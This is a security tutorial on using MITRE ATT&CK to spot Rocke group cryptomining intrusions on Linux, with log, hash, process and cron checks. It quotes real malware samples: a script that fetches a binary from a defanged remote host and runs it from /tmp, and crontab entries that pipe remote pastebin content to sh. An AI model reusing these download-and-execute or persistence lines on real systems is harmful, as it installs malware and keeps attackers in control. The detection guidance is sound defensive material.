Working with the MITRE ATT&CK knowledge base
Detective Work
The MITRE ATT&CK website keeps information on attackers and intrusion techniques. We'll show you how to use that information to look for evidence of an attack.
Security has many facets and angles, and if you really want to be safe, you need to be aware of them all. One important skill is to become familiar with the logfiles on your system and the information they might reveal (see the box entitled "All About Logs"). But attackers have become increasingly sophisticated in recent years, and to stay ahead of them, you need all the help you can get. Another important source of information is the MITRE ATT&CK website [1]. MITRE ATT&CK is a structured, globally available knowledge base describing adversary tactics, techniques, and the groups that use them. In addition to tracking the various attack methods used in the wild, MITRE ATT&CK also provides clues that will help you look for evidence.
About Logs
Linux systems store data in logfiles, which fall into four main categories: application, event, service, and system logs. Most logs are stored as plain text. Entries typically include the time, type, and severity level of the event, as well as the name of the process and its process ID (PID). There are exceptions, such as wtmp and lastlog, which have a binary format. Logfiles are generally kept in the /var/log directory, but not always: some programs save their logs elsewhere.
On systems that run systemd, many users reach for the journalctl command, which displays the messages collected by the systemd journal.
When diagnosing problems or errors, the first thing to do is check the logs. Searching through logs can be tedious and time consuming, which is why many users rely on simple tricks in the Bash shell. Text processing commands such as grep and awk are popular tools for pulling information out of logs and are especially useful for quick one-liner queries. Scripts save time and make it easier to extract valuable data from logs.
A simple example of such a one-liner, which collects every IPv4 address mentioned in the logs, is:
grep -E -r -o -h "([0-9]{1,3}\.){3}[0-9]{1,3}" /var/log | sort | uniq > our-data.txt
The grep command uses a regular expression (the -E switch enables extended regular expressions) to search the /var/log directory recursively (switch -r) and prints only the matched parts, one per line (switch -o). The -h switch suppresses the file name prefix, so that identical addresses found in different files compare equal. The sort command sorts the addresses, and the uniq command removes duplicates. The result of this pipeline is saved to the our-data.txt file.
Searching for Evidence
It's best to learn from examples. One threat facing users today is attacks related to stealing system resources for the purposes of mining cryptocurrency. The techniques that hackers use are quite interesting and sometimes unconventional. The Rocke group is a good example. Rocke is a Chinese group of cyber criminals who specialize in malware attacks to gain access for crypto mining [2][3][4][5]. This group has been operating since 2018 and is dynamically developing its arsenal. The group evolves quickly and changes its techniques. Analysis of a Rocke group attack is not as easy as it might seem, but luckily, you can turn to the MITRE ATT&CK framework. Some of the techniques that MITRE ATT&CK associates with the Rocke group include:
- T1036.005 – Masquerading: Match Legitimate Name or Location
- T1053.003 – Scheduled Task/Job: Cron
- T1574.006 – Hijack Execution Flow: Dynamic Linker Hijacking
The following sections take a closer look at these techniques and what to do about them. Before delving into the details, remember that it is always a good idea to look for suspicious files.
Malware often creates files in the following directories:
/usr/local
/usr/sbin
/tmp
It is worth examining these locations for suspicious files. You might find file names that closely resemble legitimate ones, and sometimes a file name is generated automatically and consists of a series of numbers. It is also good practice to check the hashes of these files: if a hash differs from what it should be, the file has been replaced or tampered with. You can submit the hash to the VirusTotal platform [6] to check whether it belongs to a known malicious sample. The following command finds every executable file in these directories, computes its SHA256 checksum, and saves the results to the list.txt file:
find /usr/local /usr/sbin /tmp -type f -executable -exec sha256sum '{}' \; > list.txt
T1036.005: Masquerading
Suppose the group downloads a payload using the curl or wget command. The configuration file and the malware binary are saved in the /tmp directory under the name kthrotlds. The malware is launched with the nohup command, discarding its output and running the binary in the background. This is a form of masquerading: the system will constantly show a process called kthrotlds, which looks like the name of a kernel thread, but a legitimate process of that name would never run from a binary in the /tmp folder.
Listing 1 shows part of the malicious code.
Listing 1
Malicious Code
if [ ${ARCH}x = "x86_64x" ]; then
  (curl -fsSL hxxp://sowcar[.]com/t6/678/1552060180x1822611359.jpg -o \
  /tmp/kthrotlds||wget -q hxxp://sowcar[.]com/t6/678/1552060180x1822611359.jpg -O \
  /tmp/kthrotlds) && chmod +x /tmp/kthrotlds
elif [ ${ARCH}x = "i686x" ]; then
  (curl -fsSL hxxp://sowcar[.]com/t6/678/1552060225x1822611359.jpg -o \
  /tmp/kthrotlds||wget -q hxxp://sowcar[.]com/t6/678/1552060225x1822611359.jpg -O \
  /tmp/kthrotlds) && chmod +x /tmp/kthrotlds
else
  (curl -fsSL hxxp://sowcar[.]com/t6/678/1552060225x1822611359.jpg -o \
  /tmp/kthrotlds||wget -q hxxp://sowcar[.]com/t6/678/1552060225x1822611359.jpg -O \
  /tmp/kthrotlds) && chmod +x /tmp/kthrotlds
fi
nohup /tmp/kthrotlds >/dev/null 2>&1 &
By default, Linux does not log information on open ports and connections. However, netstat comes to the rescue:
netstat -tupln
This command lists the listening TCP and UDP sockets (port and IP address) together with the owning process; run it as root so that the -p switch can show the program name for every socket. Omit the -l switch to see established connections to and from the system as well. You can then trace the connections that are in place and track down the undesirable ones.
Another way to spot a masquerading process is with the ps command:
ps auxf
This command displays a tree of all processes running on the system. A malicious process often appears with its name in square brackets, which ps uses when a process has no command line at all; normally that indicates a kernel thread, and malware imitates this appearance to blend in.
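The check below is an added example and not part of the article: it walks /proc and reports processes that look like kernel threads (empty command line, as ps shows with square brackets) or that run from a scratch directory such as /tmp, while still being backed by a real executable; a genuine kernel thread has no /proc/PID/exe target at all. The function name and the constructed /proc tree in demo_masquerading are this example's own; run it as root so that every process's exe link is readable.

```shell
# Added example (not from the article). Pass a directory to scan a
# constructed tree instead of the real /proc.
find_masquerading() {
    proc="${1:-/proc}"
    for dir in "$proc"/[0-9]*; do
        [ -d "$dir" ] || continue
        pid="${dir##*/}"
        exe=$(readlink "$dir/exe" 2>/dev/null) || exe=""
        # No executable: a real kernel thread (or one we may not inspect).
        [ -n "$exe" ] || continue
        comm=$(cat "$dir/comm" 2>/dev/null) || comm="?"
        reason=""
        # Empty cmdline on a process that has an executable: it is
        # imitating a kernel thread, which is what ps shows as [name].
        if [ -z "$(tr -d '\000' < "$dir/cmdline" 2>/dev/null)" ]; then
            reason="empty-cmdline"
        fi
        # Binary living in a world-writable scratch directory.
        case "$exe" in
            /tmp/*|/var/tmp/*|/dev/shm/*) reason="${reason:+$reason,}tmp-exe" ;;
        esac
        if [ -n "$reason" ]; then
            printf '%s %s %s %s\n' "$pid" "$comm" "$exe" "$reason"
        fi
    done
    return 0
}

# Constructed /proc tree for a stand-alone run: a real kernel thread
# (pid 2, no exe), a masquerading binary with a kernel-looking name
# (pid 1234, blank cmdline, exe in /tmp), and a normal process (pid 777).
demo_masquerading() {
    t=$(mktemp -d)
    mkdir -p "$t/2" "$t/1234" "$t/777"
    printf 'kthreadd\n'  > "$t/2/comm";    : > "$t/2/cmdline"
    printf 'kthrotlds\n' > "$t/1234/comm"; : > "$t/1234/cmdline"
    ln -s /tmp/kthrotlds "$t/1234/exe"
    printf 'sleep\n' > "$t/777/comm"; printf 'sleep\0inf\0' > "$t/777/cmdline"
    ln -s /usr/bin/sleep "$t/777/exe"
    find_masquerading "$t"
    rm -rf "$t"
}
```

On a live system call find_masquerading with no argument; the constructed tree reports only pid 1234, as "1234 kthrotlds /tmp/kthrotlds empty-cmdline,tmp-exe".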
T1053.003 – Cron
Hackers use a variety of techniques to achieve persistent access to the system after restarting. One of these methods is to add tasks to the cron tool. Cron allows you to plan your tasks and gives you the ability to follow commands according to the schedule without logging into the system. Listing 2 shows a few crontab
entries that could execute malicious code.
Listing 2
Crontab Entries
*/10 * * * * root (curl -fsSL hxxps://pastebin[.]com/raw/1NtRkBc3||wget -q -O- hxxps://pastebin[.]com/raw/1NtRkBc3)|sh
##

*/15 * * * * (curl -fsSL hxxps://pastebin[.]com/raw/1NtRkBc3||wget -q -O- hxxps://pastebin[.]com/raw/1NtRkBc3)|sh
##
In this case, the attacker does two things:
- Adds a new crontab entry that points to a malicious script.
- Places the malicious script in a folder, which allows it to execute at the time defined in the crontab entry.
That is why it is always worth checking cron tasks for suspicious entries:
crontab -l
Note that crontab -l only lists the crontab of the current user; run it as root, or use crontab -u USER -l, to check other accounts.
Malware can manipulate the cron utility in various ways, therefore it is also worth looking at the following locations:
/var/spool/cron/root
/var/spool/cron/crontabs/root
/etc/cron.d/root
/etc/cron.hourly/oanacroner
/etc/cron.daily/oanacroner
/etc/cron.monthly/oanacroner
Or perform a search to find other cron-related files and directories on your system.